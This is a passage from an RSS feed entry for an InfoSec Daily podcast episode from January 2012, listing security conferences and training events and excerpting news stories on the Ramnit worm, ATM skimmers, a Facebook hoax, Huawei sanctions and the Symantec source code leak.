	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 9th, 2012 at 6:00PM</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: ICF International, 9300 Lee Highway, Fairfax, VA</span><br />
	<a href="http://maps.google.com/maps/ms?hl=en&amp;gl=us&amp;ptab=2&amp;ie=UTF8&amp;oe=UTF8&amp;msa=0&amp;msid=104405866946229741710.00048046ec622944cab00&amp;ll=38.871786,-77.265805&amp;spn=0.003968,0.006614&amp;t=h&amp;z=18"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://maps.google.com/maps/ms?hl=en&amp;gl=us&amp;ptab=2&amp;ie=UTF8&amp;oe=UTF8&amp;msa=0&amp;msid=104405866946229741710.00048046ec622944cab00&amp;ll=38.871786,-77.265805&amp;spn=0.003968,0.006614&amp;t=h&amp;z=18</span></a></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CampusCon 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 21, 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland</span><br />
	<a href="http://campuscon.hackingwit.com/"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://campuscon.hackingwit.com</span></a><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">(from Baconzombie)</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">New England InfoSec Tweetup</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 21, 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Ledgewood Hills Clubhouse &#8211; Nashua, NH</span><br />
	<a href="http://neistu3.eventbrite.com/"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://neistu3.eventbrite.com/</span></a></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts January 24, 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code:</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25484"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Schmoocon Epilogue</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: After Schmoocon</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington, DC</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hit up anyone in NOVA Hackers</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Metasploit Framework Unleashed Cincinnati</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: February 11, 2012. </span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&rsquo;s College of Informatics</span><br />
	<a href="https://msfucincy.wordpress.com/"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://msfucincy.wordpress.com/</span></a><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">$20 donation for #HFC</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 5-9 <br />
	Where: Seattle, Washington</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: April 9-13 <br />
	Where: Bristol, UK</span><br />
	<a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span><br />
	&nbsp;</p>
<div dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></div>
<div dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://news.techworld.com/security/3327502/murder-retrial-ordered-after-court-records-destroyed-by-virus/"><span style="font-size:15px;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.techworld.com/security/3327502/murder-retrial-ordered-after-court-records-destroyed-by-virus/</span></a></div>
<p><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A convicted murderer has been granted a retrial after a stenographer&rsquo;s backup record of his trial was apparently destroyed by a malware infection.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The possibly unique sequence of events came to a head when Randy Chaviano, 26, appealed against his 2009 conviction in a Florida court for shooting Charles Acosta during an alleged drug deal.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When the Appeal Court discovered that almost no records of the trial still existed, the judge the struck down the conviction and ordered a retrial.</span></p>
<div dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></div>
<div dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><a href="http://www.theregister.co.uk/2012/01/05/ramnit_social_networking/"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.theregister.co.uk/2012/01/05/ramnit_social_networking/</span></a></div>
<p><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A bank account-raiding worm has started spreading on Facebook, stealing login credentials as it creeps across the site, security researchers have revealed.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Evidence recovered from a command-and-control server used to coordinate the evolving Ramnit worm confirms that the malware has already stolen 45,000 Facebook passwords and associated email addresses. Experts from Seculert, who found the controller node, have supplied Facebook with a list of all the stolen credentials found on the server. Most of the victims are from either the UK or France.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Ramnit differs from other worms, such as Koobface, that have used Facebook to spread because it relies on multiple infection techniques and has only recently extended onto social networks. Koobface, by contrast, only uses Facebook or Twitter to spread.</span></p>
<div dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></div>
<div dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><a href="http://www.cio.com/article/697405/Anatomy_of_an_ATM_Skimmer_Scam"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.cio.com/article/697405/Anatomy_of_an_ATM_Skimmer_Scam</span></a></div>
<p><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">You may already know that its important to protect your financial information when you shop online. But a high-tech threat can steal your credit card information when youre out shopping around town. Scammers can steal your ATM or credit card information without your even noticing, and the technology behind their tricks is getting more and more advanced.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The crime called credit card skimming has become increasingly common in the past few years. In fact, authorities recently uncovered a large, sophisticated skimming operation where scammers attached their devices onto the self-checkout machines at 24 Lucky supermarkets in Northern California. The scam caught hundreds of customers who used the self-checkout machines in October and November 2011 and had their account information stolen.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Obviously, skimmers are a serious security threat. But how exactly do these devices work, and how do you protect yourself from them?</span></p>
<div dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></div>
<div dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://news.softpedia.com/news/Insert-Name-Here-Is-Probably-Not-a-Facebook-Hacker-244741.shtml"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.softpedia.com/news/Insert-Name-Here-Is-Probably-Not-a-Facebook-Hacker-244741.shtml</span></a></div>
<p><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;Do not accept a friend request from Tanner Dwyer, Christopher Butterfield, Stefania Colac and Alejando Spiljner. These are hackers so put it on your wall. If someone add&#39;s them they take your contacts, empty your computer and addresses, so copy and paste this on your wall,&rdquo; reads the sample provided by Hoax-Slayer, usually in UPPERCASE letters.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The names will change from time to time, but the fact of the matter is that no one can hack a computer just by befriending someone on Facebook.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It&rsquo;s true that in the past period cybercriminals began relying of all sorts of malicious strategies to take over Facebook accounts and use them to spread other schemes, but it&rsquo;s a long way from adding a friend to being hacked.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">First of all, even if poor Stefania Colac is not a malicious hacker, it&rsquo;s recommended to check out a person before accepting a friendship request. Recent studies revealed that cybercriminals could rely on mutual friends to launch their operations.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Secondly, don&rsquo;t click on links that promise leaked celebrity tapes, free gift cards to McDonald&rsquo;s, iPads, or any other fabulous prizes. If you already fell for such a scam and shared it with your friends, make sure you delete it from your wall.</span></p>
<div dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></div>
<div dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span></div>
<div dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://www.infoworld.com/d/the-industry-standard/us-state-department-investigating-huawei-iran-concerns-183258"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.infoworld.com/d/the-industry-standard/us-state-department-investigating-huawei-iran-concerns-183258</span></a></div>
<p><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The U.S. Department of State said on Wednesday it is investigating Huawei Technologies for allegedly providing censorship and mobile phone tracking technology to Iran, following a request from six U.S. lawmakers.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Department of State &quot;shares the concern of any potential export of technology to Iran that is to be used specifically to disrupt, monitor or suppress communication of the people of Iran,&quot; said department spokeswoman Beth Gosselin in an email.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The allegations arose after The Wall Street Journal published a</span><a href="http://online.wsj.com/article/SB10001424052970204644504576651503577823210.html"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> report</span></a><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> in October linking Huawei&#39;s export of technology to Iran with the country&#39;s suppression of dissidents using mobile phone tracking technology.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Following the report, six U.S. lawmakers asked U.S. Secretary of State Hillary Clinton in December</span><a href="http://www.computerworld.com/s/article/9223136/U.S._lawmakers_push_for_Huawei_investigation"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> to investigate</span></a><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> Huawei for possibly violating U.S. sanctions against Iran. Under the Comprehensive Iran Sanctions Accountability and Divestment Act (</span><a href="http://www.cfr.org/iran/comprehensive-iran-sanctions-accountability-divestment-act-hr-2194/p22484"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">CISADA</span></a><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">), passed in 2010, the U.S. government will not enter into contracts with companies that export sensitive technology to the country.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;This is a complex process and may take some time,&quot; Gosselin said. &quot;If we assess that a company has engaged in the kind of activity sanctionable under CISADA, we will take appropriate action.&quot;</span></p>
<div dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></div>
<div dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.securityweek.com/symantec-confirms-hackers-accessed-source-code-two-enterprise-security-products"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securityweek.com/symantec-confirms-hackers-accessed-source-code-two-enterprise-security-products</span></a></div>
<p><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Symantec confirmed with SecurityWeek early Friday morning that the products in question are Symantec Endpoint Protection 11.0 and Symantec Antivirus 10.2, so this incident did NOT involve its consumer products which are &ldquo;Norton&rdquo; branded.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">While many would expect the &ldquo;FUD&rdquo; factor to kick in, its important to realize a few facts. Symantec updates its products on a &ldquo;.1 basis&rdquo;, and its Endpoint Protection product is now at version 12.0 and 12.1. According to a Symantec spokesperson, &ldquo;SEP 11 was four years ago to be exact.&rdquo;</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In addition, Symantec Antivirus 10.2 has been discontinued, though the company continues to service it.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;We&rsquo;re taking this extremely seriously and are erring on the side of caution to develop and long-range plan to take care of customers still using those products,&rdquo; Cris Paden, Senior Manager of Corporate Communications at Symantec told SecurityWeek.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;It&rsquo;s also important to bear in mind that this is not a virus or false positive. The products are not broken. They perform just fine and work just fine.&rdquo;</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Unlike the RSA breach when hackers penetrated company networks to steal confidential data and intellectual property, Symantec confirmed that its systems had not been breached. </span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;Symantec&rsquo;s own network was not breached, but rather that of a third party entity,&rdquo; the company said in a statement.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The hacker group assumed to be responsible is operating under the name Dharmaraja, and claims it found the data after compromising Indian military intelligence servers.</span></p>
<div dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&#8230;</span></div>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-561-saved-by-the-virus-slurping-worm-anatomy-of-a-skimmer-scam-facebook-cisada-symantec/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3341/0/infosec-daily-podcast-episode-561.mp3" length="29959877" type="audio/mpeg" />
		<itunes:duration>1:02:22</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 561 for January 6, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, and Dr. Bonez.
	&#160;
Announcements:
Information Security Blogger Awards 2012
	Since we w[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 561 for January 6, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, and Dr. Bonez.
	&#160;
Announcements:
Information Security Blogger Awards 2012
	Since we were over looked again for the Best Podcast on Security you can email ashimmy@hotmail.com with your name, email address and ISD Podcast as your write-in nominee. &#160;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &#160;Vote for your favorite blogs as well on www.ashimmy.com.
	Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	NOVA Hackers Open House
	When: January 9th, 2012 at 6:00PM
	Where: ICF International, 9300 Lee Highway, Fairfax, VA
	http://maps.google.com/maps/ms?hl=en&#38;gl=us&#38;ptab=2&#38;ie=UTF8&#38;oe=UTF8&#38;msa=0&#38;msid=104405866946229741710.00048046ec622944cab00&#38;ll=38.871786,-77.265805&#38;spn=0.003968,0.006614&#38;t=h&#38;z=18
	CampusCon 2012
	When: January 21, 2012
	Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland
	http://campuscon.hackingwit.com
	(from Baconzombie)
	New England InfoSec Tweetup
	When: January 21, 2012
	Where: Ledgewood Hills Clubhouse &#8211; Nashua, NH
	http://neistu3.eventbrite.com/
	SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
	When: Starts January 24, 2012
	Where: Atlanta, GA
	Discount Code:
	http://www.sans.org/mentor/details.php?nid=25484
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	Schmoocon Epilogue
	When: After Schmoocon
	Where: Washington, DC
	Hit up anyone in NOVA Hackers
	Metasploit Framework Unleashed Cincinnati
	When: February 11, 2012. 
	Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&#8217;s College of Informatics
	https://msfucincy.wordpress.com/
	$20 donation for #HFC
	Social Engineering Training
	When: March 5-9 
	Where: Seattle, Washington
	When: April 9-13 
	Where: Bristol, UK
	http://www.social-engineer.com/social-engineer-training
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
